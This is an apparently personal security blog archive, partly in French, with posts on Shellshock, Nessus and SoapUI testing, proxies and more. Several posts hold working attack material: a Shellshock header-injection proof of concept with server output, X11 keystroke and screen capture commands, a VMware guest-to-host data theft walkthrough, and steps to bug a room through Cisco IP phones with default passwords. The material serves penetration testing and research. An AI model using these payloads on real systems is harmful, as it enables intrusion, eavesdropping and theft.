Sep 29, 2014

Current Intel on BashBug / Shellshock

CVE-2014-6271  (1st bug report)
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-7169   (2nd bug/variant, aka AfterShock)
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

CVE-2014-7186   (3rd bug/variant found by Redhat's Florian Weimer)
The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue.

CVE-2014-7187    (4th bug/variant found by Redhat's Florian Weimer)
Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue.

CVE-2014-6277   (5th bug/variant found by Google's Michael Zalewski)
Variant 1. GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.

CVE-2014-6278   (6th bug/variant found by Google's Michael Zalewski)   (reserved, not available yet)
Variant 2. (see Variant 1 CVE-2014-6277 for a description)

From SANS Advisory Board: Only the first two listed above are patched in “main stream” linux distros. A source code patch is available for the rest if you want to compile bash yourself, but exploitation is a tad harder for the last 4.

Other Info
GNU Patch Info
List for current bash (4.3):
Latest bash patch (027):


Network Detection (IDS, IPS, WAF)
  • VRT and EmergingThreats posts showing this is being addressed for Snort
  • ...

Bash Test Strings
Command line tests to verify proper patching (and to somehow use in our detections):
  • Early patch: env x='() { :;}; echo Not patched' bash -c "echo This is a test."
  • Later patch: foo='() { echo Not patched; }' bash -c foo
  • (search for more...)

Sep 25, 2014

POC for ShellShock / BashBug CVE-2014-6271

Ref CVE:

I tried real quick in a VM and it's easy to inject via user-agent and cookie headers. I didn't get much result though via a GET parameter though (either via URL-encoding or by just encoding spaces) but I just wanted to prove the point for myself quickly...

Simple CGI Script on a vulnerable server

/usr/lib/cgi-bin$ cat
echo -e "Content-type: text/plain\n\n"
echo "hi ya! Is there a file in /tmp as a result of this?";
echo "Output from env:"

GET request from attacker

GET /cgi-bin/ HTTP/1.1
Host: localhost
Content-Length: 0
User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie
Connection: keep-alive

GET response received by attacker

HTTP/1.1 200 OK
Date: Thu, 25 Sep 2014 23:42:53 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 1866
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

hi ya! Is there a file in /tmp as a result of this?
Output from env:

Result on attacked server

$ ls /tmp/Hacked*
/tmp/HackedViaCookie /tmp/HackedViaUserAgent

May 1, 2014

Getting started in web services testing with SoapUI and Mutillidae

J'ai écrit cet article pour aider quiconque qui désire commencer à utiliser SoapUI pour vérifier la sécurité de services web (SOAP). Pour ce faire, on commence par mettre en place Mutillidae qui contient quelques services à tester. Par la suite, on exécute un test d'injection SQL.

Excusez l'anglais. Je n'ai pas vraiment le temps de le traduire.  Mais une image vaut mille mots, n'est-ce pas?

 This post is meant to help a security tester with setting up SoapUI and use it against the test web services included in Mutillidae.

Setting up a local test environment with web services

Setting up SoapUI

  • Setup SoapUI and create a test project for Mutillidae and load the various Mutillidae WSDL files and setup the associated test suites for each WSDL:
  •  As a simple test, double click getUserInformation and add username and password values as follows: 

  •   Click on the green Submit Request button and wait for the response in the right pane:

  Creating a security test

  •   Create a new Security Test:

  • Optionally, add another specific assertion, as demonstrated below.

Note that adding an XPath assertion for many injection issue testing may not be a good idea. At least, you have to ensure that the assertion will cover all the cases. For example, below, we add an XPath expression to cover the case of a normal request (node count = 1) and the case of an empty result set (node count = 0).

  Running the test

  Inspecting the results

Dec 16, 2013

Acquérir la mémoire vive avec Dumpit.

Acquérir la mémoire vive avec Dumpit.

Acquiring memory with Dumpit

Nov 13, 2013

Proxy d'interception en mode "headless" | Headless intercepting proxy

Voici les options utilisables que je connais pour intercepter du  traffic HTTP lorsque tout ce qu'on a est Kali Linux isolé (accédé via SSH sans aucune option d'accès X/VNC et sans accès Internet):
Par exemple, on peut utilser le mode de défilement lors de la capture tout en sauvegardant les flots HTTP dans un fichier. Par la suite, on visionne les détails des flots en mode plein écran:
# mitmdump -w /var/log/mitmdump-$$.log -v -p 8080 GET
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    If-Modified-Since: Wed, 13 Nov 2013 17:27:42 GMT
    If-None-Match: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"

 << 304 Not Modified 0B

    Expires: Wed, 13 Nov 2013 17:30:43 GMT
    Date: Wed, 13 Nov 2013 17:30:43 GMT
    Cache-Control: private, max-age=0
    ETag: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
    Server: GSE

# mitmproxy -r /var/log/mitmdump-3099.log
>> GET
← 304 [empty content]

2013-11-13 12:30:43 GET
← 304 [empty content]
Request                                   Response
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
If-Modified-Since: Wed, 13 Nov 2013 17:27:42 GMT
If-None-Match: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
2013-11-13 12:30:43 GET
                        ← 304 [empty content]
Request                                  Response
Expires:        Wed, 13 Nov 2013 17:30:43 GMT
Date:           Wed, 13 Nov 2013 17:30:43 GMT
Cache-Control:  private, max-age=0 
ETag:           "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
Server:         GSE

Ces autres options offrent aussi un mode "headless" qui ne sont pas aussi simples à utiliser:
  • Zed Attack Proxy avec l'option "-daemon": -daemon. Mon expérience dit qu'on doit savoir éditer les fichiers xml de configuration du proxy pour obtenir ce qu'on veut. Pas l'option la plus intéressante.
  • Burp avec l'option -Djava.awt.headless=true. Scripts qui utilisent cette option: and bscan 
  • Proxystrike avec l'option -c (console) - pas certain si cette option est vraiment utilisable...
  • Metasploit socks4a auxiliary server:
msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > info

Name: Socks4a Proxy Server
Module: auxiliary/server/socks4a
Version: 0
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST yes The address to listen on
SRVPORT 1080 yes The port to listen on.

This module provides a socks4a proxy server that uses the builtin
Metasploit routing to relay connections.

msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server
msf auxiliary(socks4a) > jobs


Id Name
-- ----
0 Auxiliary: server/socks4a
Here are the usable options I know to intercept HTTP traffic in headless mode. I've had to use that on an isolated Kali Linux (accessed via SSH without possibility for X/VNC and without Internet download capability):
There are other options on Kali but they are not as usable or simple to setup:

Nov 12, 2013

Balayer des sites protégés contre les attaques CSRF

Pour permettre le balayage de sites protégés contre les attaques de falsification de requêtes inter-site ou "Cross-Site Request Forgery" (CSRF), un plugiciel Burp a été développé (preuve de concept). Celui-ci peut être trouvé ici

Tiré d'un article sur
In order to perform an automatic scan of CSRF-protected sites, requests must be performed sequentially as each requests contains a new generated anti-CSRF token needed for the next request, forming a token chain.

A POC in the form of a Burp suite plugin has been developed to verify this approach, it can be downloaded at It should be noted however that this code is a POC and it requires further development in other to be able to work against real environments (any link of a webapp with this behavior is appreciated).

Original post origin:

Jul 25, 2013

Conserver les "line-breaks" de HTML vers Excel (sans rangée additionnelle)

Voici un problème fréquent: on veut importer un tableau HTML vers Excel sans que Excel interprète les tags de retour de chariot <BR> comme un changement de rangée - rendant impossible les fonctions d'ordonnancement et de filtration. Selon moi, le fait de pas avoir de flexibilité à cet égard à partir de l'interface usager de Excel est un bug!

La solution la plus simple est d'ajouter un style spécifique à Microsoft (dans le fichier HTML) comme suit:

<html>... <style> br { mso-data-placement:same-cell; } </style> ...</html>

Merci à Michu (24/7 dev & coffee blog) pour le tuyau!

Ref: Generating Excel files from web - line breaks in cells 

Thanks to Michu for the great tip... Initial text copied here for convenience...

Generating Excel files from web - line breaks in cells

...I needed to wrap text in cell, but when I put tag into HTML output, Excel interpreted it as a new row, not a line-break in existing cell. The solution I found is to add into a stylesheet:
    br {mso-data-placement:same-cell;}

Jan 11, 2013

Attaque de serveur X11 sans authentification (après xhost +)

Voici quelques commandes pour exploiter un serveur X11 ouvert:

Capture de clés à distance (remote key capture)
$ xkey IP:0.0

  • Le code source pour xkey.c peut être trouvé ici
  • Utiliser 0.0 pour le port 6000, 1.0 pour le port 6001...
Capture de l'écran (screen capture):
$ xwd -display IP:0.0 -root -silent -out /tmp/screendump
$ xv /tmp/screendump 
$ xwd -display IP:0.0 -root -silent | xwdtopnm | pnmtopng > Screenshot.png


Dec 2, 2012

Analysis of Android app traffic through Burp Suite

Good summary here

Related articles

Nov 23, 2012

Forcing Firefox to remember passwords

The Firefox configuration setting wallet.crypto.autocompleteoverride  allows the override of the autocomplete="off" so that passwords are always remembered. This may be useful where Greasemonkey isn't available (i.e. on Android). I'll need to test this...

Of course, this needs to be used with caution (on a test system, if Firefox isn't the default browser...).

As said, on a desktop, a better option is to use a Greasemonkey script or modify the nsLoginManager.js file.

Ref: Wallet.crypto.autocompleteoverride - MozillaZine Knowledge Base

Oct 22, 2012

Stealing host data from a VMware vSphere 5.0 VM

This post in inspired by the Insinuator site's presentation on an attack on public IaaS clouds (+ follow-up post) that support VM uploads and that are based on VMware ESXi 5.0. Essentially, it's about a VM guest being able to read files on the ESXi host after abusing a VMDK Descriptor File's content.

I wanted to check if this is really a problem (i.e. the whole attack path being valid) or if this post was just something half-baked or simple "food for thought".

Reproducing this in my own environment 

Here, I'll try to reproduce what the above post did while checking that this is really a problem with VMware. I mean, this will only be a problem if exporting/importing the VM to/from OVF format works. In other words, if VMware performs clean-up/validation of while deploying OVF files, this alleged vulnerability may be irrelevant.

Test Environment: ESXi  5.0.0 #1 SMP Release build-474610 Aug 26 2011 13:51:17 x86_64)

Step 1: Simulate the stealing of the host's volume details from a Debian guest

On ESXi host:
  • Connect to ESXi server using VMware vSphere Client 5.0
  • Create a small Debian 6.0.3 Server VM
  • SSH to ESXi hypervisor (SSH Server has to be turned on) - 
Here we will work on the host's files directly instead of exporting them to a different format (ie: OVF, OVA...) and then reimporting them.
  • Edit resulting vmdk descriptor file (on the ESXi host directly). Added line in blue:
/vmfs/volumes/4e5bfad0-283f8ee6-1b9d-b499ba04496a/Small and temporary VM for Eric # vi Small\ and\ temporary\ VM\ for\ Eric.vmdk
# Disk DescriptorFile

# Extent description
RW 2097152 VMFS "Small and temporary VM for Eric-flat.vmdk"
RW 32 VMFS "/bootbank/state.tgz"[...]
  • Back in vSphere client, start the Debian VM
  • SSH to VM or use the vSphere Client to get into the VM's console
  • Multiply the VMFS size above by the block size of 512: 2097152 * 514 = 1073741824  (OFFSET)

  • Create new loopback device that points after the VMDK: losetup -v -o OFFSET -f /dev/sda 
  • Use loopback device to extract data: tar -x -i --ignore-command-error --ignore-failed-read -z -f /dev/loop0 
  • Extract files in the gzip package: tar -x -i --ignore-command-error --ignore-failed-read -z -f local.tgz [screenshot of above steps]
  • Examine the content of the extracted data. Get the device file name from etc/vmware/esx.conf (naa...) [screenshot]
Good! we can get host volume details from a guest!

Step 2: Simulate the stealing of a host's volume content from a Debian guest
  • In the host's console session, change the vmdk descriptor file as follows (added line in blue), taking into consideration the volume details obtained before:
/vmfs/volumes/4e5bfad0-283f8ee6-1b9d-b499ba04496a/Small and temporary VM for Eric # vi Small\ and\ temporary\ VM\ for\ Eric.vmdk
# Disk DescriptorFile

# Extent description
RW 2097152 VMFS "Small and temporary VM for Eric-flat.vmdk"
RW 8386560 VMFSRAW "/dev/disks/naa.600508b1001c1bd269ddc2f549010bad:2"
  • Restart the VM and reestablish a shell session to it
  • View the data of the volume [screenshot]

NB: Although the above steps were successful to demonstrate how a guest could abuse access to data on the host, I could not reproduce the same thing by creating a portable OVF format that could be deployed to the host from a remote vSphere client (simulating a malicious IaaS customer).

However, my testing wasn't exhaustive. I didn't try to craft an OVF package taking into consideration the above. Somehow, I can't imagine that the deployment of such as package (with an absolute path pointing to a known host file/device) would work. Perhaps I should have thought of that before I started all this testing!

Nevertheless, it's not completely impossible that a cloud provider would use a different portable format that would allow this attack vector to work.

Oct 19, 2012

Web credential stealing (even HTTPS) via Windows event traces

Mark Bagget a trouvé une méthode pour extraire les détails de session web (même celles utilisant SSL) en activant le tracage Event Tracing for Windows (EVT), incluant le nom d'usager et mot de passe. Les détails sur le wiki de PaulDotCom. Cette méthode a certains prérequis (WinInet API).
Mark Bagget was able to extract web session details (including user credentials using SSL) by turning on some event tracing on a Windows target (i.e. post exploitation tool). This is described on the PaulDotCom show notes at
Episode300 - PaulDotCom Security Weekly. NB: this method has prerequisites (WinInet API usage).

Oct 16, 2012

Montreal Java User Group

Le Montréal Java User Group (JUG) est un groupe d'utilisateurs Java se réunissant régulièrement afin d'échanger des idées et de discuter des avancées technologiques de la plateforme Java.

Oct 14, 2012

Cisco IP Telephony security auditing ideas

Here's some ideas for security auditing a Cisco IP Telephony solution.

Password Auditing

Web UI

Use Burp to send POST requests (for all users) to the Cisco Call Manager login form at https://.../ccmuser/

IP phone PIN 

The programmatic approach to test for Phone PIN would use an approach as described here:

NB: I haven't done that test automatically to avoid problems (in Prod) but I think that the clean sequence required looks like this:
  • Get SIDVAL: /ccmpd/ 
  • Try logging in -- if we get XML w/o error, we're good; set pin value to your Org's default: /ccmpd/
  • Initiate logout: /ccmpd/
  • Confirm logout and close session: /ccmpd/


Test other URIs used by Cisco IP phone

  • http://.../ccmcip/xmldirectory.jsp 
  • http://.../ccmcip/getservicesmenu.jsp 
  • http://.../ccmcip/GetTelecasterHelpText.jsp 
  • http://.../ccmcip/authenticate.jsp

Check if IP Phones can be used to remotely bug a (conference) room 

Another test idea is to see if listening in on remote conversations is possible because of unchanged defaults. This is described here

Excerpt from above reference (in case the above post disappears):
There exists an interesting “feature” in Cisco IP phones that allows a crafty user to remotely control a Cisco IP phone and set it to call a remote number (if setup to do so) and allow audio to stream normally — in effect allowing someone to remotely audio bug a room. In all fairness, this feature requires the controlling user to know the configured password for the phone which many installations leave the default password of “cisco” set.

To try this out:
  1. Telnet to the phone (e.g. “telnet″). You may need to bridge your PC to the IP Phone VLAN from within the office (see,2, use VLAN as determined from an IP phone's settings - eg: VLAN 161, IP:, DHCP server:, Host Name: SEPD0C282439930)
  2. Enter the password for the phone At the “SIP Phone>” prompt: Start a “test” session with “test open”
  3. Virtually take the phone off the hook with “test offhook”
  4. Virtually dial the telephone number where the audio stream should go with “test key ” (e.g. “test key 14155556666″) 
  5. The phone will start to make the call… Switch to speakerphone with “test key spkr” (to virtually push the Speakerphone key) 
  6. Listen to the audio streaming from the phone… 

Sep 6, 2012

Présentations du SANS sur la conscientisation des usagers

SANS a mis à notre disposition des présentations pour conscientiser les usagers des TI sur la sécurité informatique. Il en existe déjà au moins une en français.
SANS Security Awareness Presentations:
Securing The Human: takes you step by step how to build a high-impact awareness program that ensures your organization is not only compliant but secure by changing human behavior. Topics include building your Steering Committee, identifying WHO you are targeting in your program, WHAT you want to communicate and HOW. In addition we cover key topics such as updating your program and how to measure it through effective metrics.
Securing The Kids: for parents to help better understand and how to protect their kids online. We cover the top three risks kids face online and the top five steps you can take to protect them. This course is based on the experiences and lessons learned from a variety of SANS top instructors who not only specialize in security, but are parents just like you.
Internet Security Guide For Kids:for parents to present to K-5th graders on how they can safely use the Internet. The information here is similar to the lessons learned in Securing The Kids, but presented in a graphical, kid friendly manner.

Aug 7, 2012

Configurer Nessus pour des balayages d’applications web

Lorsqu’on utilise Nessus pour balayer un site web, il est important de bien configurer les paramètres globaux pour aller chercher le maximum de vulnérabilités.
Le site de support de Tenable contient un bon article qui explique comment on fait. J’ai copié ici-bas les détails (en Anglais).

  • On peut importer des cookies pour faciliter l’accès avec pré-authentification
  • Pour obtenir un fichier qui contient des cookies actifs, on peut utiliser Firefox et exporter ses cookies via un ajout tel que Export Cookie
  • Il est aussi très important d’ajuster quelques paramètres dans Nessus: Enable CGI scanning, HTTP Cookies import, Web App Test Settings, ajouter des points de départs de balayage dans Web Mirroring, (+ utiliser des plugins qui utilisent ces paramètres)


What needs to be configured to ensure a thorough web application audit is performed by Nessus?


Tenable encourages users to run a full vulnerability scan with all plugins enabled. If you want to streamline a policy to only focus on a web application, the following steps outline the process for creating a new policy designed to run a web application audit:
  1. Create a new policy. (Policies -> Add)
  2. Under the “General” tab options, set up a scan as you normally would. Ensure at least one TCP-based port scanner is selected and provide a list of ports with web servers running on the host(s). Note: Only use this method if you are absolutely sure you know of all web servers running on the targets. Otherwise, select a port range so that Nessus can detect web servers and applications to audit.
  3. Under the “Plugins” tab, ensure the following plugin families are enabled:
    1. CGI abuses – This plugin family checks for a wide range of commercial and open source applications that have documented vulnerabilities. These checks include software detection, information disclosure, SQL injection, file inclusion, overflows and more.
    2. CGI abuses : XSS – This plugin family checks for a wide range of commercial and open source applications that have documented Cross-site Scripting (XSS) vulnerabilities.
    3. Database – Many web applications will utilize a database for storing large amounts of data. SQL injection attacks are designed to target database servers via web applications.
    4. FTP – Some sites use FTP for administrators to upload web application content or update the application.
    5. General – This plugin family contains plugins that identify operating systems via HTTP, perform a wide variety of SSL checks and more.
    6. Service detection – Contains checks for a wide variety of services and technologies, many of which support web servers and applications.
    7. Web servers – This plugin family contains over 500 checks for vulnerabilities in popular web servers including Apache, Tomcat, IIS and WebSphere. In addition, this plugin family includes checks for frameworks such as PHP, common web server issues associated with the HTTP(S) protocol, OpenSSL checks and more.
  4. Under the “Preferences” tab, there are several drop-down menus with additional configuration options that must be specified:
    1. Under “Global variable settings”, select “Enable CGI scanning”. Optionally, the “Thorough tests (slow)” can be enabled and “Report verbosity” can be set to “Verbose” to provide additional vulnerability checks and better reporting.
    2. The “HTTP cookies import” drop-down can be used to import cookies as a means for authenticating to the application. This is not explicitly required, but some means of authentication should be provided.
    3. The “HTTP login page” drop-down provides over a dozen options that direct Nessus to a custom web application. This includes the URL to the login page (e.g., /application/login.php), login form (i.e., if the login data is sent to a different location), relevant form fields for authentication (the “user” and “pass” variables should be changed to reflect your application, %USER% and %PASS% are pulled from the “Login configurations” drop-down menu) and options that control how Nessus behaves in relation to the authentication process.
    4. The “Login configurations” can be used if the application is protected using HTTP Basic Authentication, Digest or NTLM.
    5. The “Web Application Tests Settings” drop-down contains several important options for enabling testing of custom applications. The “Enable web applications tests” must be enabled, or Nessus will only scan for known vulnerabilities based on prior public disclosures. This page also contains options for limiting the time to test an application, use of POST requests, the type of argument values to use (refer to the Nessus User Guide for additional information on this option) and more.
    6. The “Web mirroring” drop-down directs Nessus’ behavior for mirroring the application, a step performed before tests are calculated and run. The total number of pages or depth of mirroring can be controlled, along with the starting page and a delimited list of regular expressions that are used to match web pages that Nessus will exclude (e.g., logout|emailus.php).
For more information about the settings you can watch our instructional videos at:
Additionally, you can find detailed information on the preferences in the Nessus User Guide.
Other Refs:
  • From the Discussions Forum, another related post regarding the use of cookie importing:
  • The missing link in the Nessus docs is that to get the cookie file, you need to use Firefox and export using an add-on such as:
  • Also very important is to tweak a few settings in Nessus: Enable CGI scanning, HTTP Cookies import, Web App Test Settings, Web Mirroring starting points (+ choose some plugins that use these)

May 22, 2012

Comment cloner une puce logicielle SecurID (software token)

Sensepost a démontré sur son blog la semaine passée comment un attaquant déterminé peut dévier la protection offerte par les soft-tokens SecurID. On peut déduire les valeurs secrètes (seed) si on prend contrôle d’un système (ex.: vol de matériel, logiciels malveillants).
Last week’s blog post by SensePost’s Behrang Fouladi demonstrated another way determined attackers could in certain cases circumvent protections built into SecurID.
By reverse engineering software used to manage the cryptographic software tokens on computers running Microsoft’s Windows operating system, he found that the secret “seed” was easy for people with control over the machines to deduce and copy. He provided step-by-step instructions for others to follow in order to demonstrate how easy it is to create clones that mimic verbatim the output of a targeted SecurID token.
“When the above has been performed, you should have successfully cloned the victim’s software token and if they run the SecurID software token program on your computer, it will generate the exact same random numbers that are displayed on the victim’s token,” Fouladi wrote.

May 9, 2012

Attention aux gestionnaires de mots de passe intégrés aux Navigateurs

Cet article montre un parfait exemple pourquoi on doit éviter d’utiliser les gestionnaires intégrés (trop automatisés) dans les navigateurs web.
The article Abusing Password Managers with XSS « Neohapsis Labs is the perfect example for why we avoid using automated password submission features in web browsers (either built-in, plugins or other tools). We somehow need to reach a balance between security and ease-of-use.

Mar 12, 2012

OpenDNS – Parental Controls

À utiliser sur votre réseau domestique, les services de protection de Il y a plusieurs options gratuite mais j’aime particulièrement le service OpenDNS HomeVIP qui coûte que 20$/an. Cette option permet d’obtenir des rapports sur notre utilisation de notre service Internet. Plus d’information ici: OpenDNS – Parental Controls.
Everybody should be using this service at home: OpenDNS – Parental Controls.
There are various options but I particularly like the HomeVIP option. It costs 20$/year but it provides reporting that is very useful to understand your Internet usage.

Jan 12, 2012

Nessus, IID & botnet detection

Brought to you by Tenable…
Nessus uses data provided by Internet Identity IID, a company that maintains a list of hosts it has determined through various technical means are part of a botnet. Nessus does not perform the technical checks itself; rather it compares the IP addresses being scanned against a list maintained by IID. Inclusion in IID’s list is typically accurate, they experience a very low rate of false positives.
If a host is reported as part of a botnet, there are several things you can do to help validate the finding and respond to the issue:
  1. Check the host against additional third-party lists to determine if the host shows up in those resources:,,
  2. Check the host against known Unsolicited Bulk E-mail UBE/spam blacklists:
  3. Look for any evidence of the host being compromised e.g., suspicious activity, newly installed software, machine resources being heavily utilized.
  4. Perform a full vulnerability scan to determine if any high-risk or critical vulnerabilities are present, that may represent the point of intrusion. Ensure web application auditing is enabled, as Nessus can identify malicious web content related to botnet activities.
  5. Move the host to an isolated network and use a network sniffer to monitor traffic being sent from the machine.
If you still have questions about your host appearing in the list, you can contact IID at with questions. Your initial mail should include the IP address in question, when the IP was reported i.e., when you ran your Nessus scan and any additional information about the host that may be relevant.via Tenable Customer Support Portal (for registered users).

Jan 11, 2012

Clonage de cartes d’accès “Prox” et RFID

Voici un site intéressant qui montre comment cloner des cartes d’accès sans contact (proximity card). L’autre donne ses schémas électroniques et ses techniques de clonage.
Here’s a very interesting site that demonstrates how to clone contactless proximity cards. The author provides electronic schematics and cloning techniques.

Jan 8, 2012

Installer Google Chrome Frame dans Internet Explorer

Voici où on doit aller pour installer Google Chrome Frame, le module pour Internet Explorer. Pour en savoir davantage sur cette façon d’utiliser Chrome à même Internet Explorer, on peut aller ici pour une bonne introduction. Ceci permet, par exemple, d’obtenir les extensions HTML5.
Here’s where to go for installing Google Chrome Frame. To know more about this mechanism to use Chrome from within Internet Explorer, we can go here for a good intro. Adding this IE module will, for instance, allow you to use HTML5 extensions.

Vérifier la performance d’un site web

Le site WebPagetest offre plusieurs options pour vérifier la performance d’un site web afin de l’optimiser.
The WebPagetest site provides a great way to check a web site’s performance.

Jan 4, 2012

Qu’avez-vous à perdre?

Qu’a-t’on a perdre lors d’une attaque informatique? Ça dépend de notre secteur d’activité mais en général
Réputation et marque de commerce
  • Attention négative du public
  • Perte de revenus future
Viabilité financière
  • Coûts reliés aux investigations internes et à la gestion des crises
  • Pénalités de non conformité et de divulgation
  • Diminution de la valeur à la Bourse
Propriété intellectuelle
  • Divulgation d’information confidentielle, de vos processus, de votre liste de clients…
Confidentialité et partenaires
  • Poursuite en justice
  • Perte de confiance des clients et partenaires

Jan 3, 2012

Vulnérabilité wifi via WPS

Voici des détails sur la vulnérabilité qui permettrait de pratiquement court-circuiter la sécurité WPA/WPA-2 lorsque “wifi protected setup” est activé (sur certains modèles).  Un chiffrier est en construction (par la communauté) qui contient des résultats de tests de la vulnérabilité.

NB: j’ai essayé Reaver 1.3 avec peu de succès avec un DLink DIR-655. L’outil fonctionne en lui spécifiant un PIN spécifique pour obtenir le secret partagé (PSK). Mais après approximativement 60 à 80 requêtes pour deviner (bruteforce) le PIN, le DLink n’accepte plus d’essais sans une réinitialisation du routeur, ce qui rend l’attaque inutile. Selon mes tests (avec quelques autres modèles/manufacturiers), je crois que ce problème serait peut-être plus généralisé qu’on l’imagine…
Here’s some details on the vulnerability that allows the bypass of WPA/WPA-2 security when a Wireless Access Point has “WIFI Protected Setup” enabled (for certain models & manufacturers). A spreadsheet is currently in construction with the results of WPS Vulnerability Testing (by the security community). My testing with a DLink DIR655 have been non conclusive – i.e. the device doesn’t appear to be vulnerable.

Nov 28, 2011

Mozilla Firefox about:config

Mozilla Firefox permet la configuration de beaucoup de paramètres qui ne sont pas tous disponibles via son interface usager. Pour y parvenir, on entre about:config dans l’addresse. Mais que veulent dire toutes les paramètres et valeurs associées? Pour répondre à cette question, on peut consulter cet article sur
Here is a reference to the entries in about:config, where all user preferences in Mozilla Firefox can be viewed and modified.

Mesurer la sécurité – Security measures

Voici quelques références qui aident dans les mesures en sécurité informatique.
Refs related to the measurement of security (KPIs, KRIs, KCIs)
  1. NIST SP800-55: Perf. Measurement Guide for Infosec (see Appendix A for examples)
  2. NIST SP800-53: Assessing Security Controls, Building Effective Security Assessment Plans
  3. NIST SP800-40: Section 3 – Security Metrics for Patch & Vulnerability Mgmt
  4. NIST Maturity Levels: High-level security program maturity
  5. ISO 27004:2009:  IT Security Techniques – Infosec Mgmt – Measurement – top-down & bottom-up approach to security metrics, in line with other 27K standards
  6. ISO 21827:2008: IT Security techniques – Systems Security Engineering- Capability Maturity Model (SSE-CMM)
  7. Security Metrics: Replacing Fear, Uncertainty and doubt book
  8. DOD’s Measuring Security:  published in 2009, compares NIST, ISO, ISACA… refers to other sources:

Nov 18, 2011

Tenable Security Center et sqlite

Le produit Tenable Security Center utilise une BD sqlite. Voici quelques commande qui aident à extraire de l’information de la BD de Security Center, en utilisant la commande sqlite3…
Tenable Security Center uses an sqlite database. Here’s a few commands to help extract data out of database files.

# cd /opt/sc4
# /opt/sc4/support/bin/sqlite3 application.db “.tables”
AcceptRiskRules                   AppStyle
AdminDashboardTab                 AppStyleAttribute
AdminPreferences                  AppStyleFamily
AdminUser                         AppStyleFamilyMapping
AppAuditFile                      AppWindowsCredential
AppAuditFilePlugins               AssetTemplate
AppCredential                     AssetTemplateClause
AppDashboardComponent             AssetTemplateClauseGroup
AppDashboardTab                   Configuration
AppDataTimestamps                 CorrelatedRepositoryLCE
AppKerberosCredential             Email
AppPolicy                         LCE
AppPolicyAuditFile                LCESilo
AppPolicyDisabledPlugins          LCETypes
AppPolicyEnabledPlugins           OrgLCE
AppPolicyFamily                   OrgRepository
AppPolicyPluginPrefs              Organization
AppPolicyTemplate                 PassiveScanner
AppPolicyTemplateAuditFile        PassiveScannerRepository
AppPolicyTemplateDisabledPlugins  RecastRiskRules
AppPolicyTemplateEnabledPlugins   Repository
AppPolicyTemplateFamily           Scanner
AppPolicyTemplatePluginPrefs      UserAuth
AppReportTemplate                 Zone
AppRole                           ZoneOrganization
AppSNMPCredential                 ZoneScanner
AppSSHCredential                  sc4Schema

# /opt/sc4/support/bin/sqlite3 jobqueue.db “.tables”
JobQueue   sc4Schema

# /opt/sc4/support/bin/sqlite3 application.db “SELECT * FROM Configuration”
# /opt/sc4/support/bin/sqlite3 application.db “.schema”
CREATE TABLE [Configuration] (
[type] INTEGER,
, [editable] BOOLEAN NOT NULL DEFAULT ‘true’);
CREATE TABLE [CorrelatedRepositoryLCE] (

Nov 16, 2011

Nouvelle version de Burp Suite Professional

Comme d’habitude, Dafydd Stuttard aka Portswigger fait des miracles avec Burp. La dernière version facilite les tests de “cross-site request forgery”. Les versions précédentes permettent la bonne gestion des réponses en transit (streaming), une recherche “grep” améliorée, un déverminage du traçage de (jetons de) sessions. Plus de détails ici.
As always, Dafydd Stuttard aka Portswigger is doing miracles with Burp. The latest version simplifies “cross-site request forgery” testing. Other previous versions allow better management of streamed HTTP responses, a better “grep” keyword matching, a session tracking debugger, etc.  More details can be found in his Release Notes.